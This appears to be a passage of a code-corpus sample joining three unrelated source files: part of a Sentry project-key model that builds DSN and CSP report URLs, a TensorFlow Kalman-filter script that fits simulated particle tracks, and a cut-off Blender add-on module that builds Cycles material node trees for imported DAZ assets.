url = settings.SENTRY_PUBLIC_ENDPOINT or settings.SENTRY_ENDPOINT
if url:
urlparts = urlparse(url)
else:
urlparts = urlparse(options.get('system.url-prefix'))
return '%s://%s@%s/%s' % (
urlparts.scheme,
key,
urlparts.netloc + urlparts.path,
self.project_id,
)
@property
def dsn_private(self):
return self.get_dsn(public=False)
@property
def dsn_public(self):
return self.get_dsn(public=True)
@property
def csp_endpoint(self):
endpoint = settings.SENTRY_PUBLIC_ENDPOINT or settings.SENTRY_ENDPOINT
if not endpoint:
endpoint = options.get('system.url-prefix')
return '%s%s?sentry_key=%s' % (
endpoint,
reverse('sentry-api-csp-report', args=[self.project_id]),
self.public_key,
)
def get_allowed_origins(self):
from sentry.utils.http import get_origins
return get_origins(self.project)
def get_audit_log_data(self):
return {
'label': self.label,
'public_key': self.public_key,
'secret_key': self.secret_key,
'roles': int(self.roles),
'status': self.status,
}
def get_scopes(self):
return self.scopes
|
#~ imports from world
import time
import numpy as np
import argparse
from pprint import pprint
import tensorflow as tf
#~ imports from this repo
from generate_tracks import gen_tracks
np.random.seed(42)
tf.config.threading.set_intra_op_parallelism_threads(1)
tf.config.threading.set_inter_op_parallelism_threads(1)
argParser = argparse.ArgumentParser()
argParser.add_argument("-n", type=int, dest="n", default=1, help="nInputs")
args = argParser.parse_args()
n_gen = args.n
d = 1.0 # Distance between planes
N = 5 # Number of planes
sigma = 10e-2 # Resolution of planes
z = 0.1 # Thickness of absorber
x0 = 0.01 # Radiation length of absorber
theta0 = 10e-3 # Multiple scattering uncertainty (TODO: use formula)
#~ initiate the matrices as numpy arrays
#~ F is the transfer matrix
F = np.array([[1, d, 0, 0],
[0, 1, 0, 0],
[0, 0, 1, d],
[0, 0, 0, 1]])
#~ G is the noise matrix
G = np.array([[1 / sigma ** 2, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 1 / sigma ** 2, 0],
[0, 0, 0, 0]])
#~ H the relation between the measurement m and the state p
H = np.array([[1, 0, 0, 0],
[0, 0, 0, 0],
[0, 0, 1, 0],
[0, 0, 0, 0]])
#~ Q is the random error matrix, ie the scatter
Q = np.zeros(4)
#~ C0 is the initial parameters
C0 = np.array([[sigma ** 2, 0, 0, 0],
[0, np.pi, 0, 0],
[0, 0, sigma ** 2, 0],
[0, 0, 0, np.pi]])
#~ Convert numpy arrays to tensors
F_tensor = tf.constant(F, dtype=tf.float32)
F_scalar = tf.constant(F_tensor, dtype=tf.float32)
F = tf.Variable(np.tile(F_tensor, (n_gen, 1, 1)), dtype=tf.float32)
G = tf.constant(G, dtype=tf.float32)
H = tf.constant(H, dtype=tf.float32)
Q = tf.constant(Q, dtype=tf.float32)
C0 = tf.constant(C0, dtype=tf.float32)
#~ initiate projected and filtered tracks and covariances
projectedTrack = None
projectedCov = None
filteredTrack = None
filteredCov = None
def residual(hits, p_filtered, H):
"""Calculates the residuals between hit and fitted track
Takes: hits, p_filtered, H
Returns: Tensor of residuals"""
# Pad to shape of p, transpose to col vector
hits_full_dim = tf.transpose(tf.pad(tf.expand_dims(hits, 1), [[0, 0], [0, 1]]))
return hits_full_dim - (H @ tf.transpose(p_filtered))
def chiSquared(residual, G, C_proj, p_proj, p_filt):
"""Calculates the chi-squared of the hit against fitted track
Parameters: residual (as a function), G, current projection,
projected path, filtered path (?)
Returns: Tensor of Einstein Summations?"""
t1 = tf.einsum("iB,jB -> B", residual, G @ residual)
p_diff = p_filt - p_proj
C_diff = tf.einsum("Bij,Bj -> Bi", tf.linalg.inv(C_proj), p_diff)
t2 = tf.einsum("Bi,Bj -> B", p_diff, C_diff)
return t1 + t2
def project(F, p, C, Q):
"""Given the current state of the track, give an estimated
projection of where the hit will be on the next detector plane"""
# p_proj = tf.einsum('ji,iB->Bj', F_scalar, p)
# With vector of Fs
p_proj = tf.einsum("Bji,iB->Bj", F, p)
C_proj = tf.transpose(F_scalar @ C) @ tf.transpose(F_scalar) + Q
return p_proj, C_proj
def filter(p_proj, C_proj, H, G, m):
"""Correct the projected track, given the observed hit"""
HG = tf.transpose(H) @ G
# Innermost two axies must be 'matrix'
inv_C_proj = tf.linalg.inv(C_proj)
C = tf.linalg.inv(inv_C_proj + HG @ H) #~ ? what takes precedence here? @?
# Reversing batch dimension -> fix me!
p = tf.einsum("Bij,Bj->Bi", inv_C_proj, p_proj) + tf.einsum("ji,iB->Bj", HG, m)
p = tf.einsum("Bij,Bj->Bi", C, p)
return p, C
def bkgTransport(C, F, C_proj):
# Extra transpose (both) to make this work with axis ordering
return C @ tf.transpose(F, (0, 2, 1)) @ tf.linalg.inv(C_proj)
def smooth(p_k1_smooth, p_k1_proj, C_k1_smooth, C_k1_proj, p_filtered, C_filtered, A):
"""Once all observations and filtering stages have been applied,
smooth the overall track into a single linear trajectory"""
# Also reversed batches!
p_smooth = p_filtered + tf.einsum("Bij,jB->iB", A, p_k1_smooth - p_k1_proj)
# Transpose only inner 'matrix' dimensions
C_smooth = C_filtered + A @ (C_k1_smooth - C_k1_proj) @ tf.transpose(A, (0, 2, 1))
return p_smooth, C_smooth
def project_and_filter_internal(i, m, hits, p, C,
filteredTrack,
filteredCov,
projectedTrack,
projectedCov):
global F #* ?
p = filteredTrack[i - 1]
C = filteredCov[i - 1]
p_proj, C_proj = project(F, p, C, Q)
m[0, :].assign(hits[:, i, 0])
m[2, :].assign(hits[:, i, 1])
p_filt, C_filt = filter(p_proj, C_proj, H, G, m)
# res = residual(hits[:,i], p_filt, H)
# chiSq = chiSquared(res, G, C_proj, p_proj, p_filt)
# skipIdxs = tf.where(chiSq > 100. * tf.ones(chiSq.shape))
# p_proj = tf.tensor_scatter_nd_update(p_proj, skipIdxs, tf.squeeze(tf.gather(projectedTrack[i-1], skipIdxs), axis = 1))
# C_proj = tf.tensor_scatter_nd_update(C_proj, skipIdxs, tf.squeeze(tf.gather(projectedCov[i-1], skipIdxs), axis = 1))
#
# p_filt = tf.tensor_scatter_nd_update(p_filt, skipIdxs, tf.squeeze(tf.gather(tf.transpose(filteredTrack[i-1]), skipIdxs), axis = 1))
# C_filt = tf.tensor_scatter_nd_update(C_filt, skipIdxs, tf.squeeze(tf.gather(tf.transpose(filteredCov[i-1], (2, 0, 1)), skipIdxs), axis = 1))
#
# # Reset, in case we set this to + 1 last time
# F = F_init
# F = tf.tensor_scatter_nd_update(F, skipIdxs, tf.squeeze(tf.gather(F, skipIdxs), axis = 1) + updF)
# TODO: Sort out this transpose nightmare....
#? why what's wrong with it?
p_filt = tf.transpose(p_filt)
C_filt = tf.transpose(C_filt, (1, 2, 0))
return p_proj, C_proj, p_filt, C_filt
if __name__ == "__main__":
# n_gen defined globally
#~ input are generated tracks.
#~ outputs are project track, proj covariance,
#~ smooth track, smooth covariance,
#~ filtered track, filtered covariance
hits, trueTracks = gen_tracks(n_gen=n_gen)
print("hits\n", hits, "\ntruetracks\n", trueTracks)
hits = tf.constant(hits, dtype=tf.float32)
m0 = tf.Variable(tf.zeros((4, n_gen))) # (hit_x, slope_x, hit_y, slope_y)
m0[0, :].assign(hits[:, 0, 0]) # First plane, x hits
m0[2, :].assign(hits[:, 0, 1]) # First plane, y hits
p0 = m0
C0 = tf.constant(np.stack([C0 for i in range(n_gen)], -1), dtype=tf.float32)
start = time.perf_counter()
p_proj, C_proj = project(F, p0, C0, Q)
p, C = filter(p_proj, C_proj, H, G, m0)
p = tf.transpose(p)
C = tf.transpose(C, (1, 2, 0))
projectedTrack = tf.Variable([p_proj for i in range(N)])
projectedCov = tf.Variable([C_proj for i in range(N)])
filteredTrack = tf.Variable([p for i in range(N)])
filteredCov = tf.Variable([C for i in range(N)])
m = tf.Variable(tf.zeros((4, n_gen)))
for i in range(1, N):
#~ project forward, filter / smooth backwards.
p_proj, C_proj, p_filt, C_filt = project_and_filter_internal(
tf.constant(i),
m,
hits,
p,
C,
filteredTrack,
filteredCov,
projectedTrack,
projectedCov)
filteredTrack[i].assign(p_filt)
filteredCov[i].assign(C_filt)
projectedTrack[i].assign(p_proj)
projectedCov[i].assign(C_proj)
smoothedTrack = tf.Variable([filteredTrack[-1] for i in range(N)])
smoothedCov = tf.Variable([tf.transpose(filteredCov[-1]) for i in range(N)])
reversedPlaneIndices = list(range(0, N - 1))
reversedPlaneIndices.reverse()
for i in reversedPlaneIndices:
p_k1_proj, C_k1_proj = projectedTrack[i + 1], projectedCov[i + 1]
p_filtered, C_filtered = filteredTrack[i], filteredCov[i]
p_k1_smooth, C_k1_smooth = smoothedTrack[i + 1], smoothedCov[i + 1]
A = bkgTransport(tf.transpose(C_filtered, (2, 0, 1)), F, C_k1_proj)
p_smooth, C_smooth = smooth(
p_k1_smooth,
tf.transpose(p_k1_proj),
C_k1_smooth,
C_k1_proj,
p_filtered,
tf.transpose(C_filtered, (2, 0, 1)),
A)
smoothedTrack[i].assign(p_smooth)
smoothedCov[i].assign(C_smooth)
end = time.perf_counter()
print(f"Time elapsed: {end - start}")
print(f"Projected\n {p_proj} \n Filtered\n {p_filt} \n Smooth\n {p_smooth} \n SmCov\n {C_smooth}")
|
<gh_stars>0
# Copyright (c) 2016-2021, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
# ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
# WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR
# ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
# ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
# SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# The views and conclusions contained in the software and documentation are those
# of the authors and should not be interpreted as representing official policies,
# either expressed or implied, of the FreeBSD Project.
import bpy
import math
import os
from mathutils import Vector, Matrix, Color
from .material import Material, WHITE, GREY, BLACK, isWhite, isBlack
from .error import DazError
from .utils import *
#-------------------------------------------------------------
# Cycles material
#-------------------------------------------------------------
class CyclesMaterial(Material):
def __init__(self, fileref):
Material.__init__(self, fileref)
self.classType = CyclesMaterial
self.tree = None
self.useEevee = False
def __repr__(self):
treetype = None
if self.tree:
treetype = self.tree.type
geoname = None
if self.geometry:
geoname = self.geometry.name
return ("<%sMaterial %s r:%s g:%s i:%s t:%s>" % (treetype, self.id, self.rna, geoname, self.ignore, self.hasAnyTexture()))
def guessColor(self):
from .guess import guessMaterialColor
from .geometry import GeoNode
from .finger import isCharacter
color = LS.clothesColor
if isinstance(self.geometry, GeoNode):
ob = self.geometry.rna
if ob is None:
pass
elif isCharacter(ob):
color = LS.skinColor
elif ob.data and ob.data.DazGraftGroup:
color = LS.skinColor
guessMaterialColor(self.rna, GS.viewportColors, False, color)
def build(self, context):
if self.dontBuild():
return
Material.build(self, context)
self.tree = self.setupTree()
self.tree.build()
def setupTree(self):
from .pbr import PbrTree
if self.isHair:
from .hair import getHairTree
geo = self.geometry
if geo and geo.isStrandHair:
geo.hairMaterials.append(self)
return getHairTree(self)
elif self.metallic:
return PbrTree(self)
elif GS.materialMethod == 'PRINCIPLED':
return PbrTree(self)
else:
return CyclesTree(self)
def postbuild(self):
Material.postbuild(self)
geonode = self.geometry
me = None
if geonode and geonode.data and geonode.data.rna:
geo = geonode.data
me = geo.rna
mnum = -1
for mn,mat in enumerate(me.materials):
if mat == self.rna:
mnum = mn
break
if mnum < 0:
return
nodes = list(geo.nodes.values())
if self.geoemit:
self.correctEmitArea(nodes, me, mnum)
if self.geobump:
area = geo.getBumpArea(me, self.geobump.keys())
self.correctBumpArea(area)
if self.tree:
if GS.pruneNodes:
marked = pruneNodeTree(self.tree)
if isinstance(self.tree, CyclesTree):
self.tree.selectDiffuse(marked)
def addGeoBump(self, tex, socket):
bumpmin = self.getValue("getChannelBumpMin", -0.01)
bumpmax = self.getValue("getChannelBumpMax", 0.01)
socket.default_value = (bumpmax-bumpmin) * LS.scale
key = tex.name
if key not in self.geobump.keys():
self.geobump[key] = (tex, [])
self.geobump[key][1].append(socket)
def correctBumpArea(self, area):
if area <= 0.0:
return
for tex,sockets in self.geobump.values():
if not hasattr(tex, "image") or tex.image is None:
continue
width,height = tex.image.size
density = width * height / area
if density == 0.0:
continue
link = getLinkTo(self.tree, tex, "Vector")
if link and link.from_node.type == 'MAPPING':
scale = link.from_node.inputs["Scale"]
density *= scale.default_value[0] * scale.default_value[1]
if density == 0.0:
continue
if density > 0:
height = 3.0/math.sqrt(density)
for socket in sockets:
socket.default_value = height
def correctEmitArea(self, nodes, me, mnum):
ob = nodes[0].rna
ob.data = me2 = me.copy()
wmat = ob.matrix_world.copy()
me2.transform(wmat)
setWorldMatrix(ob, Matrix())
area = sum([f.area for f in me2.polygons if f.material_index == mnum])
ob.data = me
setWorldMatrix(ob, wmat)
bpy.data.meshes.remove(me2, do_unlink=True)
area *= 1e-4/(LS.scale*LS.scale)
for socket in self.geoemit:
socket.default_value /= area
for link in self.tree.links:
if link.to_socket == socket:
node = link.from_node
if node.type == 'MATH':
node.inputs[0].default_value /= area
def setTransSettings(self, useRefraction, useBlend, color, alpha):
LS.usedFeatures["Transparent"] = True
mat = self.rna
if useBlend:
mat.blend_method = 'BLEND'
mat.show_transparent_back = False
else:
mat.blend_method = 'HASHED'
mat.use_screen_refraction = useRefraction
if hasattr(mat, "transparent_shadow_method"):
mat.transparent_shadow_method = 'HASHED'
else:
mat.shadow_method = 'HASHED'
if not self.isShellMat:
mat.diffuse_color[0:3] = color
mat.diffuse_color[3] = alpha
#-------------------------------------------------------------
# Cycles node tree
#-------------------------------------------------------------
NCOLUMNS = 20
XSIZE = 300
YSIZE = 250
class CyclesTree:
def __init__(self, cmat):
self.type = 'CYCLES'
self.material = cmat
self.cycles = None
self.eevee = None
self.column = 4
self.ycoords = NCOLUMNS*[2*YSIZE]
self.texnodes = {}
self.nodes = None
self.links = None
self.groups = {}
self.liegroups = []
self.diffuseTex = None
self.fresnel = None
self.normal = None
self.bump = None
self.bumpval = 0
self.bumptex = None
self.texco = None
self.texcos = {}
self.displacement = None
self.volume = None
self.useCutout = False
self.useTranslucency = False
def __repr__(self):
return ("<Cycles %s %s %s>" % (self.material.rna, self.nodes, self.links))
def getValue(self, channel, default):
return self.material.getValue(channel, default)
def isEnabled(self, channel):
return self.material.enabled[channel]
def getColor(self, channel, default):
return self.material.getColor(channel, default)
def addNode(self, stype, col=None, size=0, label=None, parent=None):
if col is None:
col = self.column
node = self.nodes.new(type = stype)
node.location = ((col-2)*XSIZE, self.ycoords[col])
self.ycoords[col] -= (YSIZE + size)
if label:
node.label = label
if parent:
node.parent = parent
return node
def getTexco(self, uv):
key = self.material.getUvKey(uv, self.texcos)
if key is None:
return self.texco
elif key not in self.texcos.keys():
self.addUvNode(key, key)
return self.texcos[key]
def getCyclesSocket(self):
if "Cycles" in self.cycles.outputs.keys():
return self.cycles.outputs["Cycles"]
else:
return self.cycles.outputs[0]
def getEeveeSocket(self):
if "Eevee" in self.eevee.outputs.keys():
return self.eevee.outputs["Eevee"]
else:
return self.eevee.outputs[0]
def addGroup(self, classdef, name, col=None, size=0, args=[], force=False):
if col is None:
col = self.column
node = self.addNode("ShaderNodeGroup", col, size=size)
group = classdef()
if name in bpy.data.node_groups.keys() and not force:
tree = bpy.data.node_groups[name]
if group.checkSockets(tree):
node.node_tree = tree
return node
group.create(node, name, self)
group.addNodes(args)
return node
def addShellGroup(self, shell, push):
shmat = shell.material
shmat.isShellMat = True
shname = shell.name
if (shmat.getValue("getChannelCutoutOpacity", 1) == 0 or
shmat.getValue("getChannelOpacity", 1) == 0):
print("Invisible shell %s for %s" % (shname, self.material.name))
return None
node = self.addNode("ShaderNodeGroup")
node.width = 240
nname = ("%s_%s" % (shname, self.material.name))
node.name = nname
node.label = shname
if shell.tree:
node.node_tree = shell.tree
node.inputs["Influence"].default_value = 1.0
return node
elif shell.match and shell.match.tree:
node.node_tree = shell.tree = shell.match.tree
node.inputs["Influence"].default_value = 1.0
return node
if self.type == 'CYCLES':
from .cgroup import OpaqueShellCyclesGroup, RefractiveShellCyclesGroup
if shmat.refractive:
group = RefractiveShellCyclesGroup(push)
else:
group = OpaqueShellCyclesGroup(push)
elif self.type == 'PBR':
from .cgroup import OpaqueShellPbrGroup, RefractiveShellPbrGroup
if shmat.refractive:
group = RefractiveShellPbrGroup(push)
else:
group = OpaqueShellPbrGroup(push)
else:
raise RuntimeError("Bug Cycles type %s" % self.type)
group.create(node, nname, self)
group.addNodes((shmat, shell.uv))
node.inputs["Influence"].default_value = 1.0
shell.tree = shmat.tree = node.node_tree
shmat.geometry = self.material.geometry
return node
def build(self):
self.makeTree()
self.buildLayer("")
self.buildCutout()
self.buildVolume()
self.buildDisplacementNodes()
self.buildShells()
self.buildOutput()
def buildShells(self):
shells = []
n = 0
for shell in self.material.shells.values():
for geonode in shell.geometry.nodes.values():
shells.append((geonode.push, n, shell))
n += 1
shells.sort()
if shells:
self.column += 1
for push,n,shell in shells:
node = self.addShellGroup(shell, push)
if node:
self.links.new(self.getCyclesSocket(), node.inputs["Cycles"])
self.links.new(self.getEeveeSocket(), node.inputs["Eevee"])
self.links.new(self.getTexco(shell.uv), node.inputs["UV"])
if self.displacement:
self.links.new(self.displacement, node.inputs["Displacement"])
self.cycles = self.eevee = node
self.displacement = node.outputs["Displacement"]
self.ycoords[self.column] -= 50
def buildLayer(self, uvname):
self.buildNormal(uvname)
self.buildBump()
self.buildDetail(uvname)
self.buildDiffuse()
self.buildTranslucency()
self.buildMakeup()
self.buildOverlay()
if self.material.dualLobeWeight == 1:
self.buildDualLobe()
elif self.material.dualLobeWeight == 0:
self.buildGlossy()
else:
self.buildGlossy()
self.buildDualLobe()
if self.material.refractive:
self.buildRefraction()
self.buildTopCoat()
self.buildEmission()
return self.cycles
def makeTree(self, slot="UV"):
mat = self.material.rna
mat.use_nodes = True
mat.node_tree.nodes.clear()
self.nodes = mat.node_tree.nodes
self.links = mat.node_tree.links
return self.addTexco(slot)
def addTexco(self, slot):
if self.material.useDefaultUvs:
node = self.addNode("ShaderNodeTexCoord", 1)
self.texco = node.outputs[slot]
else:
node = self.addNode("ShaderNodeUVMap", 1)
node.uv_map = self.material.uv_set.name
self.texco = node.outputs["UV"]
ox = self.getValue("getChannelHorizontalOffset", 0)
oy = self.getValue("getChannelVerticalOffset", 0)
kx = self.getValue("getChannelHorizontalTiles", 1)
ky = self.getValue("getChannelVerticalTiles", 1)
self.mapTexco(ox, oy, kx, ky)
for key,uvset in self.material.uv_sets.items():
self.addUvNode(key, uvset.name)
return node
def addUvNode(self, key, uvname):
node = self.addNode("ShaderNodeUVMap", 1)
node.uv_map = uvname
slot = "UV"
self.texcos[key] = node.outputs[slot]
def mapTexco(self, ox, oy, kx, ky):
if ox != 0 or oy != 0 or kx not in [0,1] or ky not in [0,1]:
sx = sy = 1
dx = dy = 0
if kx != 0:
sx = 1/kx
dx = -ox/kx
if ky != 0:
sy = 1/ky
dy = oy/ky
mapping = self.addMappingNode((dx,dy,sx,sy,0), None)
if mapping:
self.linkVector(self.texco, mapping, 0)
self.texco = mapping
def addMappingNode(self, data, map):
dx,dy,sx,sy,rz = data
if (sx != 1 or sy != 1 or dx != 0 or dy != 0 or rz != 0):
mapping = self.addNode("ShaderNodeMapping", 1)
mapping.vector_type = 'TEXTURE'
if hasattr(mapping, "translation"):
mapping.translation = (dx,dy,0)
mapping.scale = (sx,sy,1)
if rz != 0:
mapping.rotation = (0,0,rz)
else:
mapping.inputs['Location'].default_value = (dx,dy,0)
mapping.inputs['Scale'].default_value = (sx,sy,1)
if rz != 0:
mapping.inputs['Rotation'].default_value = (0,0,rz)
if map and not map.invert and hasattr(mapping, "use_min"):
mapping.use_min = mapping.use_max = 1
return mapping
return None
#-------------------------------------------------------------
# Normal
#-------------------------------------------------------------
def buildNormal(self, uvname):
if not self.isEnabled("Normal"):
return
strength,tex = self.getColorTex("getChannelNormal", "NONE", 1.0)
if strength>0 and tex:
self.buildNormalMap(strength, tex, uvname)
def buildNormalMap(self, strength, tex, uvname):
self.normal = self.addNode("ShaderNodeNormalMap", col=3)
self.normal.space = "TANGENT"
if uvname:
self.normal.uv_map = uvname
elif self.material.uv_set:
self.normal.uv_map = self.material.uv_set.name
self.normal.inputs["Strength"].default_value = strength
self.links.new(tex.outputs[0], self.normal.inputs["Color"])
#-------------------------------------------------------------
# Bump
#-------------------------------------------------------------
def buildBump(self):
if not self.isEnabled("Bump"):
return
self.bumpval,self.bumptex = self.getColorTex("getChannelBump", "NONE", 0, False)
if self.bumpval and self.bumptex:
self.bump = self.buildBumpMap(self.bumpval, self.bumptex, col=3)
self.linkNormal(self.bump)
def buildBumpMap(self, bump, bumptex, col=3):
node = self.addNode("ShaderNodeBump", col=col)
node.inputs["Strength"].default_value = bump * GS.bumpFactor
self.links.new(bumptex.outputs[0], node.inputs["Height"])
self.material.addGeoBump(bumptex, node.inputs["Distance"])
return node
def linkBumpNormal(self, node):
if self.bump:
self.links.new(self.bump.outputs["Normal"], node.inputs["Normal"])
elif self.normal:
self.links.new(self.normal.outputs["Normal"], node.inputs["Normal"])
def linkBump(self, node):
if self.bump:
self.links.new(self.bump.outputs["Normal"], node.inputs["Normal"])
def linkNormal(self, node):
if self.normal:
self.links.new(self.normal.outputs["Normal"], node.inputs["Normal"])
#-------------------------------------------------------------
# Detail
#-------------------------------------------------------------
def buildDetail(self, uvname):
if not self.isEnabled("Detail"):
return
weight,wttex = self.getColorTex(["Detail Weight"], "NONE", 0.0)
if weight == 0:
return
texco = self.texco
ox = LS.scale*self.getValue(["Detail Horizontal Offset"], 0)
oy = LS.scale*self.getValue(["Detail Vertical Offset"], 0)
kx = self.getValue(["Detail Horizontal Tiles"], 1)
ky = self.getValue(["Detail Vertical Tiles"], 1)
self.mapTexco(ox, oy, kx, ky)
strength,tex = self.getColorTex(["Detail Normal Map"], "NONE", 1.0)
weight = weight*strength
mode = self.getValue(["Detail Normal Map Mode"], 0)
# Height Map, Normal Map
if mode == 0:
if weight == 0:
pass
elif self.bump:
link = getLinkTo(self, self.bump, "Height")
if link:
mult = self.addNode("ShaderNodeMath", 3)
mult.operation = 'MULTIPLY_ADD'
self.links.new(tex.outputs[0], mult.inputs[0])
self.linkScalar(wttex, mult, weight, 1)
self.links.new(link.from_socket, mult.inputs[2])
self.links.new(mult.outputs["Value"], self.bump.inputs["Height"])
else:
tex = self.multiplyTexs(tex, wttex)
self.bump = self.buildBumpMap(weight, tex, col=3)
self.linkNormal(self.bump)
elif mode == 1:
if weight == 0:
pass
elif self.normal:
link = getLinkTo(self, self.normal, "Color")
if link:
mix = self.addNode("ShaderNodeMixRGB", 3)
mix.blend_type = 'OVERLAY'
self.linkScalar(wttex, mix, weight, "Fac")
NORMAL = (0.5, 0.5, 1, 1)
mix.inputs["Color1"].default_value = NORMAL
mix.inputs["Color2"].default_value = NORMAL
self.links.new(link.from_socket, mix.inputs["Color1"])
if tex:
self.links.new(tex.outputs[0], mix.inputs["Color2"])
self.links.new(mix.outputs["Color"], self.normal.inputs["Color"])
else:
self.links.new(tex.outputs[0], self.normal.inputs["Color"])
else:
self.buildNormalMap(weight, tex, uvname)
if wttex:
self.links.new(wttex.outputs[0], self.normal.inputs["Strength"])
if self.bump:
self.links.new(self.normal.outputs["Normal"], self.bump.inputs["Normal"])
self.texco = texco
#-------------------------------------------------------------
# Diffuse and Diffuse Overlay
#-------------------------------------------------------------
def getDiffuseColor(self):
color,tex = self.getColorTex("getChannelDiffuse", "COLOR", WHITE)
effect = self.getValue(["Base Color Effect"], 0)
if effect > 0: # Scatter Transmit, Scatter Transmit Intensity
tint = self.getColor(["SSS Reflectance Tint"], WHITE)
color = self.compProd(color, tint)
return color,tex
def compProd(self, x, y):
return [x[0]*y[0], x[1]*y[1], x[2]*y[2]]
def buildDiffuse(self):
self.column = 4
if not self.isEnabled("Diffuse"):
return
color,tex = self.getDiffuseColor()
self.diffuseTex = tex
node = self.addNode("ShaderNodeBsdfDiffuse")
self.cycles = self.eevee = node
self.linkColor(tex, node, color, "Color")
roughness,roughtex = self.getColorTex(["Diffuse Roughness"], "NONE", 0, False)
if self.isEnabled("Detail"):
detrough,dettex = self.getColorTex(["Detail Specular Roughness Mult"], "NONE", 0, False)
roughness *= detrough
roughtex = self.multiplyTexs(dettex, roughtex)
self.setRoughness(node, "Roughness", roughness, roughtex)
self.linkBumpNormal(node)
LS.usedFeatures["Diffuse"] = True
def buildOverlay(self):
if self.getValue(["Diffuse Overlay Weight"], 0):
self.column += 1
slot = self.getImageSlot(["Diffuse Overlay Weight"])
weight,wttex = self.getColorTex(["Diffuse Overlay Weight"], "NONE", 0, slot=slot)
if self.getValue(["Diffuse Overlay Weight Squared"], False):
power = 4
else:
power = 2
if wttex:
wttex = self.raiseToPower(wttex, power, slot)
color,tex = self.getColorTex(["Diffuse Overlay Color"], "COLOR", WHITE)
from .cgroup import DiffuseGroup
node = self.addGroup(DiffuseGroup, "DAZ Overlay")
self.linkColor(tex, node, color, "Color")
roughness,roughtex = self.getColorTex(["Diffuse Overlay Roughness"], "NONE", 0, False)
self.setRoughness(node, "Roughness", roughness, roughtex)
self.linkBumpNormal(node)
self.mixWithActive(weight**power, wttex, node)
return True
else:
return False
def getImageSlot(self, attr):
if self.material.getImageMod(attr, "grayscale_mode") == "alpha":
return "Alpha"
else:
return 0
def raiseToPower(self, tex, power, slot):
node = self.addNode("ShaderNodeMath", col=self.column-1)
node.operation = 'POWER'
node.inputs[1].default_value = power
if slot not in tex.outputs.keys():
slot = 0
self.links.new(tex.outputs[slot], node.inputs[0])
return node
def getColorTex(self, attr, colorSpace, default, useFactor=True, useTex=True, maxval=0, value=None, slot=0):
channel = self.material.getChannel(attr)
if channel is None:
return default,None
if isinstance(channel, tuple):
channel = channel[0]
if useTex:
tex = self.addTexImageNode(channel, colorSpace)
else:
tex = None
if value is not None:
pass
elif channel["type"] in ["color", "float_color"]:
value = self.material.getChannelColor(channel, default)
else:
value = self.material.getChannelValue(channel, default)
if value < 0:
return 0,None
if useFactor:
value,tex = self.multiplySomeTex(value, tex, slot)
if isVector(value) and not isVector(default):
value = (value[0] + value[1] + value[2])/3
if not isVector(value) and maxval and value > maxval:
value = maxval
return value,tex
#-------------------------------------------------------------
# Makeup
#-------------------------------------------------------------
def buildMakeup(self):
if not self.getValue(["Makeup Enable"], False):
return False
wt = self.getValue(["Makeup Weight"], 0)
if wt == 0:
return
from .cgroup import MakeupGroup
self.column += 1
node = self.addGroup(MakeupGroup, "DAZ Makeup", size=100)
color,tex = self.getColorTex(["Makeup Base Color"], "COLOR", WHITE, False)
self.linkColor(tex, node, color, "Color")
roughness,roughtex = self.getColorTex(["Makeup Roughness Mult"], "NONE", 0.0, False)
self.linkScalar(roughtex, node, roughness, "Roughness")
self.linkBumpNormal(node)
wt,wttex = self.getColorTex(["Makeup Weight"], "NONE", 0.0, False)
self.mixWithActive(wt, wttex, node)
return True
#-------------------------------------------------------------
# Dual Lobe
#-------------------------------------------------------------
def buildDualLobe(self):
from .cgroup import DualLobeGroupUberIray, DualLobeGroupPBRSkin
if not self.isEnabled("Dual Lobe Specular"):
return
self.column += 1
if self.material.shader == 'PBRSKIN':
node = self.addGroup(DualLobeGroupPBRSkin, "DAZ Dual Lobe PBR", size=100)
else:
node = self.addGroup(DualLobeGroupUberIray, "DAZ Dual Lobe Uber", size=100)
value,tex = self.getColorTex(["Dual Lobe Specular Weight"], "NONE", 0.5, False)
node.inputs["Weight"].default_value = value
if tex:
wttex = self.multiplyScalarTex(value, tex)
if wttex:
self.links.new(wttex.outputs[0], node.inputs["Weight"])
value,tex = self.getColorTex(["Dual Lobe Specular Reflectivity"], "NONE", 0.5, False)
node.inputs["IOR"].default_value = 1.1 + 0.7*value
if tex:
iortex = self.multiplyAddScalarTex(0.7*value, 1.1, tex)
self.links.new(iortex.outputs[0], node.inputs["IOR"])
ratio = self.getValue(["Dual Lobe Specular Ratio"], 1.0)
if self.material.shader == 'PBRSKIN':
roughness,roughtex = self.getColorTex(["Specular Lobe 1 Roughness"], "NONE", 0.0, False)
lobe2mult = self.getValue(["Specular Lobe 2 Roughness Mult"], 1.0)
duallobemult = self.getValue(["Dual Lobe Specular Roughness Mult"], 1.0)
self.setRoughness(node, "Roughness 1", roughness*duallobemult, roughtex)
self.setRoughness(node, "Roughness 2", roughness*duallobemult*lobe2mult, roughtex)
ratio = 1 - ratio
else:
roughness1,roughtex1 = self.getColorTex(["Specular Lobe 1 Roughness"], "NONE", 0.0, False)
self.setRoughness(node, "Roughness 1", roughness1, roughtex1)
roughness2,roughtex2 = self.getColorTex(["Specular Lobe 2 Roughness"], "NONE", 0.0, False)
self.setRoughness(node, "Roughness 2", roughness2, roughtex2)
self.linkBumpNormal(node)
self.mixWithActive(ratio, None, node, keep=True)
LS.usedFeatures["Glossy"] = True
def getGlossyColor(self):
